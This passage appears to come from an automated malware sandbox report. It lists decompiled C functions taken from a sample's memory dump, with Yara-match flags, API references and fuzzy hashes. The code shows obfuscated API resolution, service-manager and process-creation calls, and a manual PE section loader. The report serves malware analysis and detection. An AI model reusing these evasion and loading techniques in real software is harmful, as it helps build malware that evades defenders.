				_v28 = _v28 ^ 0x088be546;
				_v28 = _v28 ^ 0x0889fb38;
				_v20 = 0x79be;
				_v20 = _v20 / _t161;
				_t162 = 0x2f;
				_v20 = _v20 * 0x21;
				_v20 = _v20 / _t162;
				_v20 = _v20 ^ 0x000058f8;
				_v12 = 0x6f12;
				_v12 = _v12 + 0x2ef8;
				_v12 = _v12 ^ 0xc4c69b2c;
				_t163 = 0x19;
				_v12 = _v12 / _t163;
				_v12 = _v12 ^ 0x07dec8f1;
				_v16 = 0x233d;
				_v16 = _v16 >> 0xd;
				_v16 = _v16 ^ 0xb86ca57e;
				_v16 = _v16 ^ 0x25a63868;
				_v16 = _v16 ^ 0x9dca839c;
				_v44 = 0x9c92;
				_v44 = _v44 ^ 0x484225af;
				_v44 = _v44 << 0xa;
				_v44 = _v44 ^ 0x0ae4f7f7;
				_v56 = 0xf3a1;
				_v56 = _v56 + 0xffff3be5;
				_v56 = _v56 ^ 0x00000dea;
				_v24 = 0xe687;
				_v24 = _v24 ^ 0x2fa59812;
				_v24 = _v24 | 0x8a70baf8;
				_v24 = _v24 << 0xe;
				_v24 = _v24 ^ 0x7fbf04b5;
				_v40 = 0x7d0b;
				_v40 = _v40 + 0xffffa14c;
				_v40 = _v40 + 0x5747;
				_v40 = _v40 ^ 0x000069af;
				_v32 = 0xbccf;
				_v32 = _v32 << 0xb;
				_v32 = _v32 + 0xa312;
				_v32 = _v32 ^ 0x05e7304f;
				_v52 = 0xd186;
				_v52 = _v52 << 7;
				_t164 = 0xc;
				_v52 = _v52 / _t164;
				_v52 = _v52 ^ 0x0008a17f;
				_push(_v48);
				E00247BAF(_v52,  &_v592, _v28, _a4, _v20, _v12, E0024889D(0x24c050, _v36, _v52));
				E00242025(_v16, _t154, _v44, _v56);
				_t159 = E0024AA3C(_v24, _v40, _v32, _v52,  &_v592); // executed
				return _t159;
			}



























                                                      0x0023c0d0
                                                      0x0023c0d3
                                                      0x0023c0d6
                                                      0x0023c0d9
                                                      0x0023c0da
                                                      0x0023c0db
                                                      0x0023c0e0
                                                      0x0023c0e6
                                                      0x0023c0ea
                                                      0x0023c0f1
                                                      0x0023c0f8
                                                      0x0023c0ff
                                                      0x0023c106
                                                      0x0023c10a
                                                      0x0023c111
                                                      0x0023c11e
                                                      0x0023c121
                                                      0x0023c124
                                                      0x0023c12b
                                                      0x0023c132
                                                      0x0023c139
                                                      0x0023c140
                                                      0x0023c147
                                                      0x0023c14e
                                                      0x0023c155
                                                      0x0023c160
                                                      0x0023c163
                                                      0x0023c16a
                                                      0x0023c171
                                                      0x0023c17f
                                                      0x0023c186
                                                      0x0023c189
                                                      0x0023c193
                                                      0x0023c196
                                                      0x0023c19d
                                                      0x0023c1a4
                                                      0x0023c1ab
                                                      0x0023c1b5
                                                      0x0023c1b8
                                                      0x0023c1bb
                                                      0x0023c1c2
                                                      0x0023c1c9
                                                      0x0023c1cd
                                                      0x0023c1d4
                                                      0x0023c1db
                                                      0x0023c1e2
                                                      0x0023c1e9
                                                      0x0023c1f0
                                                      0x0023c1f4
                                                      0x0023c1fb
                                                      0x0023c202
                                                      0x0023c209
                                                      0x0023c210
                                                      0x0023c217
                                                      0x0023c21e
                                                      0x0023c225
                                                      0x0023c229
                                                      0x0023c230
                                                      0x0023c237
                                                      0x0023c23e
                                                      0x0023c245
                                                      0x0023c24c
                                                      0x0023c253
                                                      0x0023c257
                                                      0x0023c25e
                                                      0x0023c265
                                                      0x0023c26e
                                                      0x0023c277
                                                      0x0023c27f
                                                      0x0023c282
                                                      0x0023c289
                                                      0x0023c2ad
                                                      0x0023c2bd
                                                      0x0023c2d5
                                                      0x0023c2e1

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DeleteFile
                                                      • String ID: ~.
                                                      • API String ID: 4033686569-2304494891
                                                      • Opcode ID: e11c01b653e9edafc52584965c13b241a1e557feda32ca763d527588feac30c4
                                                      • Instruction ID: bebe33c3a86c9694f0a77d57826e1209fb113644fffbee2bfd32c3a5c26e6de3
                                                      • Opcode Fuzzy Hash: e11c01b653e9edafc52584965c13b241a1e557feda32ca763d527588feac30c4
                                                      • Instruction Fuzzy Hash: F1511471C1121DEBDF48DFE5D94A8DEBBB1FB04304F208159E511B6260C7B91A54CF54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00238736, Relevance: .1, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 143c34c34cbd3b33341801c7d9cc665edc253c7b9165565ce924f81eb71ba2ac
                                                      • Instruction ID: 261cd3e86bd65de77dc65c8895570fcc03ac5bebad06e8b6854dca6c68ab90fd
                                                      • Opcode Fuzzy Hash: 143c34c34cbd3b33341801c7d9cc665edc253c7b9165565ce924f81eb71ba2ac
                                                      • Instruction Fuzzy Hash: 05215371D00209EFEF08DFA9D94A4DEBBB2EB44304F208199E415B7294E7B51B64DF81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00232959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 62%
                                                      			E00232959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E0023602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E002407A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}









                                                      0x0023295f
                                                      0x00232964
                                                      0x00232967
                                                      0x0023296a
                                                      0x0023296d
                                                      0x0023296e
                                                      0x0023296f
                                                      0x00232977
                                                      0x00232985
                                                      0x0023298a
                                                      0x00232992
                                                      0x0023299a
                                                      0x002329a2
                                                      0x002329a9
                                                      0x002329b0
                                                      0x002329b7
                                                      0x002329bb
                                                      0x002329cf
                                                      0x002329dc
                                                      0x002329e2

                                                      APIs
                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002329DC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ManagerOpen
                                                      • String ID: <^
                                                      • API String ID: 1889721586-3203995635
                                                      • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                                      • Instruction ID: 4bda07148f96ae91c4ea11f07c8683422217309d709d9b2cf065ab4d5bd33d78
                                                      • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                                      • Instruction Fuzzy Hash: 5E015B72A00108BBEB18DF95DC4A8DFBFB6EF44310F108088F508A6250D7B65F619B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0023C6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 58%
                                                      			E0023C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E0023602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E002407A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}












                                                      0x0023c6e1
                                                      0x0023c6e6
                                                      0x0023c6f0
                                                      0x0023c6fc
                                                      0x0023c703
                                                      0x0023c706
                                                      0x0023c70d
                                                      0x0023c711
                                                      0x0023c715
                                                      0x0023c71c
                                                      0x0023c723
                                                      0x0023c72a
                                                      0x0023c731
                                                      0x0023c738
                                                      0x0023c751
                                                      0x0023c762
                                                      0x0023c768

                                                      APIs
                                                      • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0023C762
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FolderPath
                                                      • String ID: /O
                                                      • API String ID: 1514166925-1923427199
                                                      • Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                                      • Instruction ID: 8d8e337f00c3192cdd29c10cc9b4f922268430cbab26b068a59f539cbbc88e3d
                                                      • Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                                      • Instruction Fuzzy Hash: 9C1133B290122DBBCB25DF95DC4A8EFBFB8EF04714F108188F90962210D3714B659BE0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00231000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42libraryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 82%
                                                      			E00231000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0023602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E002407A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}











                                                      0x00231006
                                                      0x00231009
                                                      0x0023100c
                                                      0x00231011
                                                      0x00231016
                                                      0x0023101d
                                                      0x00231026
                                                      0x0023102d
                                                      0x00231034
                                                      0x0023103b
                                                      0x00231047
                                                      0x0023104f
                                                      0x00231057
                                                      0x0023105e
                                                      0x00231065
                                                      0x0023106c
                                                      0x00231073
                                                      0x00231077
                                                      0x0023108b
                                                      0x00231096
                                                      0x0023109b

                                                      APIs
                                                      • LoadLibraryW.KERNEL32(0033A3B7), ref: 00231096
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID: [
                                                      • API String ID: 1029625771-3431493590
                                                      • Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                                      • Instruction ID: e58eb9bd9a0dd2f4184544d5c7de3129890655c1ea17d86febe5a0eb92b555e5
                                                      • Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                                      • Instruction Fuzzy Hash: AE015BB6D01308BBDF04DF94C94A5DEBBB1AB54318F108188E51466291D3B19B649F91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00234859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00234859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E002407A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}






                                                      0x0023485e
                                                      0x0023487a
                                                      0x0023487d
                                                      0x00234884
                                                      0x0023488b
                                                      0x00234892
                                                      0x0023489d
                                                      0x002348a0
                                                      0x002348ad
                                                      0x002348b7

                                                      APIs
                                                      • ExitProcess.KERNELBASE(00000000), ref: 002348B7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID: [
                                                      • API String ID: 621844428-1822564810
                                                      • Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                                      • Instruction ID: 7b45bb183b61e0dc11828fde01c81c53077722e1bcb1deb7bc3696ed0e51f854
                                                      • Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                                      • Instruction Fuzzy Hash: 7CF017B0A15209FBDB08CFE8CA9699EBFB9EB40301F20818CE444B7290E3B15F509B51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 10001780, Relevance: 3.1, APIs: 2, Instructions: 66COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 94%
                                                      			E10001780(intOrPtr* _a4, long _a8) {
				long _t31;
				signed int _t32;
				intOrPtr* _t37;
				void* _t47;
				void** _t48;
				signed int _t52;
				signed int _t55;
				long _t56;

				_t48 = _a8;
				_t56 = _t48[2];
				if(_t56 != 0) {
					_t52 = _t48[3];
					if((_t52 & 0x02000000) == 0) {
						_t31 =  *(0x10012080 + ((_t52 >> 0x1f) + ((_t52 >> 0x0000001e & 0x00000001) + (_t52 >> 0x0000001d & 0x00000001) * 2) * 2) * 4);
						if((_t52 & 0x04000000) != 0) {
							_t31 = _t31 | 0x00000200;
						}
						_t32 = VirtualProtect( *_t48, _t56, _t31,  &_a8); // executed
						asm("sbb eax, eax");
						return  ~( ~_t32);
					} else {
						_t47 =  *_t48;
						if(_t47 == _t48[1]) {
							if(_t48[4] != 0) {
								L7:
								VirtualFree(_t47, _t56, 0x4000); // executed
							} else {
								_t37 = _a4;
								_t55 =  *(_t37 + 0x30);
								if( *((intOrPtr*)( *_t37 + 0x38)) == _t55 || _t56 % _t55 == 0) {
									goto L7;
								}
							}
						}
						return 1;
					}
				} else {
					return _t56 + 1;
				}
			}











                                                      0x10001783
                                                      0x10001787
                                                      0x1000178c
                                                      0x10001797
                                                      0x100017a0
                                                      0x100017f9
                                                      0x10001806
                                                      0x10001808
                                                      0x10001808
                                                      0x10001815
                                                      0x1000181d
                                                      0x10001824
                                                      0x100017a2
                                                      0x100017a2
                                                      0x100017a7
                                                      0x100017ad
                                                      0x100017c6
                                                      0x100017cd
                                                      0x100017af
                                                      0x100017af
                                                      0x100017b2
                                                      0x100017ba
                                                      0x00000000
                                                      0x00000000
                                                      0x100017ba
                                                      0x100017ad
                                                      0x100017db
                                                      0x100017db
                                                      0x1000178e
                                                      0x10001793
                                                      0x10001793

                                                      APIs
                                                      • VirtualFree.KERNELBASE(?,?,00004000,00000000,100013CB,?,1000195F,100013CB,?,00000000,00000000,00000000), ref: 100017CD
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp Download File
                                                      Similarity
                                                      • API ID: FreeVirtual
                                                      • String ID:
                                                      • API String ID: 1263568516-0
                                                      • Opcode ID: 0a855d0dde1407c1c92472205702e4fda3e9c4e53b097d130a35f6ebea364484
                                                      • Instruction ID: f401046966946d9f8f8c45c464924eb5d72016bba8cd02ac906e1c8dccc1d15e
                                                      • Opcode Fuzzy Hash: 0a855d0dde1407c1c92472205702e4fda3e9c4e53b097d130a35f6ebea364484
                                                      • Instruction Fuzzy Hash: EB11BF327101198BE304DE09E880F9AB3BAFF947A0F46825AF509CB295DB30E951C790
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00244F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 66%
                                                      			E00244F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0023602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E002407A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}







                                                      0x00244f80
                                                      0x00244f81
                                                      0x00244f82
                                                      0x00244f86
                                                      0x00244f87
                                                      0x00244f8c
                                                      0x00244fa5
                                                      0x00244fa8
                                                      0x00244faf
                                                      0x00244fb6
                                                      0x00244fc7
                                                      0x00244fca
                                                      0x00244fd7
                                                      0x00244fe2
                                                      0x00244fe7

                                                      APIs
                                                      • CloseHandle.KERNELBASE(003E66D8), ref: 00244FE2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • String ID: {#lm
                                                      • API String ID: 2962429428-1564096886
                                                      • Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                                      • Instruction ID: d9e351559df2f839ea3f993d8248c07b88d719110bbe9f1616a24110082f9faf
                                                      • Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                                      • Instruction Fuzzy Hash: 8FF037B082120CFFDB08DFA4D98689EBFBAEB40300F208199E804AB250D3715B509B51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 10001620, Relevance: 2.6, APIs: 2, Instructions: 103memoryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 66%
                                                      			E10001620(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _t30;
				signed int _t31;
				void* _t38;
				void* _t49;
				void* _t51;
				intOrPtr _t53;
				signed int _t54;
				intOrPtr _t55;
				long _t56;
				signed int _t58;
				signed int _t59;
				intOrPtr* _t65;
				long _t66;
				intOrPtr _t68;
				void* _t70;
				void* _t72;
				void* _t75;
				long* _t77;
				void* _t78;

				_t30 = _a16;
				_t55 =  *_t30;
				_t68 =  *((intOrPtr*)(_t30 + 4));
				_t31 =  *(_t55 + 0x14) & 0x0000ffff;
				_v8 = _t68;
				_v12 = 0;
				if(0 >=  *((intOrPtr*)(_t55 + 6))) {
					L15:
					return 1;
				} else {
					_t65 = VirtualAlloc;
					_t7 = _t55 + 0x28; // 0x28
					_t77 = _t7 + _t31;
					do {
						_t56 =  *_t77;
						if(_t56 != 0) {
							if(_a8 < _t77[1] + _t56) {
								SetLastError(0xd);
								goto L17;
							} else {
								_t38 = VirtualAlloc( *((intOrPtr*)(_t77 - 4)) + _t68, _t56, 0x1000, 4); // executed
								if(_t38 == 0) {
									goto L17;
								} else {
									_t66 =  *_t77;
									_t51 =  *((intOrPtr*)(_t77 - 4)) + _t68;
									_t70 = _t77[1] + _a4;
									if(_t66 != 0) {
										_t49 = _t51;
										_t75 = _t70 - _t51;
										do {
											 *_t49 =  *((intOrPtr*)(_t75 + _t49));
											_t49 = _t49 + 1;
											_t66 = _t66 - 1;
										} while (_t66 != 0);
									}
									 *(_t77 - 8) = _t51;
									goto L13;
								}
							}
						} else {
							_t54 =  *(_a12 + 0x38);
							if(_t54 <= 0) {
								goto L14;
							} else {
								_push(4);
								_push(0x1000);
								_push(_t54);
								_push( *((intOrPtr*)(_t77 - 4)) + _t68);
								if( *_t65() == 0) {
									L17:
									return 0;
								} else {
									_t72 =  *((intOrPtr*)(_t77 - 4)) + _v8;
									 *(_t77 - 8) = _t72;
									if(_t54 != 0) {
										_t58 = _t54;
										_t59 = _t58 >> 2;
										memset(_t72 + _t59, memset(_t72, 0, _t59 << 2), (_t58 & 0x00000003) << 0);
										_t78 = _t78 + 0x18;
									}
									L13:
									_t68 = _v8;
									_t65 = VirtualAlloc;
									goto L14;
								}
							}
						}
						goto L18;
						L14:
						_t53 = _v12 + 1;
						_t77 =  &(_t77[0xa]);
						_v12 = _t53;
					} while (_t53 < ( *( *_a16 + 6) & 0x0000ffff));
					goto L15;
				}
				L18:
			}
























                                                      0x10001626
                                                      0x1000162a
                                                      0x1000162e
                                                      0x10001631
                                                      0x10001637
                                                      0x1000163a
                                                      0x10001645
                                                      0x1000170a
                                                      0x10001713
                                                      0x1000164b
                                                      0x1000164b
                                                      0x10001651
                                                      0x10001654
                                                      0x10001656
                                                      0x10001656
                                                      0x1000165a
                                                      0x100016ab
                                                      0x10001718
                                                      0x00000000
                                                      0x100016ad
                                                      0x100016bb
                                                      0x100016bf
                                                      0x00000000
                                                      0x100016c1
                                                      0x100016c4
                                                      0x100016c6
                                                      0x100016cb
                                                      0x100016d0
                                                      0x100016d2
                                                      0x100016d4
                                                      0x100016d6
                                                      0x100016d9
                                                      0x100016db
                                                      0x100016de
                                                      0x100016de
                                                      0x100016d6
                                                      0x100016e1
                                                      0x00000000
                                                      0x100016e1
                                                      0x100016bf
                                                      0x1000165c
                                                      0x1000165f
                                                      0x10001664
                                                      0x00000000
                                                      0x1000166a
                                                      0x1000166d
                                                      0x1000166f
                                                      0x10001674
                                                      0x10001677
                                                      0x1000167c
                                                      0x10001720
                                                      0x10001726
                                                      0x10001682
                                                      0x10001685
                                                      0x10001688
                                                      0x1000168d
                                                      0x1000168f
                                                      0x10001693
                                                      0x1000169f
                                                      0x1000169f
                                                      0x1000169f
                                                      0x100016e4
                                                      0x100016e4
                                                      0x100016e7
                                                      0x00000000
                                                      0x100016e7
                                                      0x1000167c
                                                      0x10001664
                                                      0x00000000
                                                      0x100016ed
                                                      0x100016f5
                                                      0x100016fa
                                                      0x100016fd
                                                      0x10001700
                                                      0x00000000
                                                      0x10001656
                                                      0x00000000

                                                      APIs
                                                      • VirtualAlloc.KERNELBASE(?,00000000,00001000,00000004,00000000,00000000,100013CB), ref: 100016BB
                                                      • SetLastError.KERNEL32(0000000D,00000000,00000000,100013CB), ref: 10001718
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp Download File
                                                      Similarity
                                                      • API ID: AllocErrorLastVirtual
                                                      • String ID:
                                                      • API String ID: 497505419-0
                                                      • Opcode ID: 499873566bbd645cff9e59e7a492908ec14657ec9cd407e7c376ee034dda42c6
                                                      • Instruction ID: fad9ae3e34d1be210c33c3a39cf181ee10ee9e26815f97c4518dfa0af5a2346d
                                                      • Opcode Fuzzy Hash: 499873566bbd645cff9e59e7a492908ec14657ec9cd407e7c376ee034dda42c6
                                                      • Instruction Fuzzy Hash: C3318F757002459BEB10CF59DC80B9AF7E5EF88380F298569E948DB349D672EC51CB60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0024976F, Relevance: 1.6, APIs: 1, Instructions: 63processCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 21%
                                                      			E0024976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0023602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E002407A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}








                                                      0x00249772
                                                      0x00249773
                                                      0x00249778
                                                      0x0024977a
                                                      0x0024977b
                                                      0x0024977e
                                                      0x0024977f
                                                      0x00249782
                                                      0x00249785
                                                      0x00249788
                                                      0x00249789
                                                      0x0024978c
                                                      0x0024978f
                                                      0x00249790
                                                      0x00249791
                                                      0x00249794
                                                      0x00249797
                                                      0x0024979a
                                                      0x0024979d
                                                      0x002497a0
                                                      0x002497a3
                                                      0x002497a6
                                                      0x002497a7
                                                      0x002497a8
                                                      0x002497ad
                                                      0x002497b7
                                                      0x002497c3
                                                      0x002497ca
                                                      0x002497d1
                                                      0x002497d8
                                                      0x002497df
                                                      0x002497e3
                                                      0x002497fc
                                                      0x00249816
                                                      0x0024981d

                                                      APIs
                                                      • CreateProcessW.KERNEL32(0023591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,0023591A), ref: 00249816
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
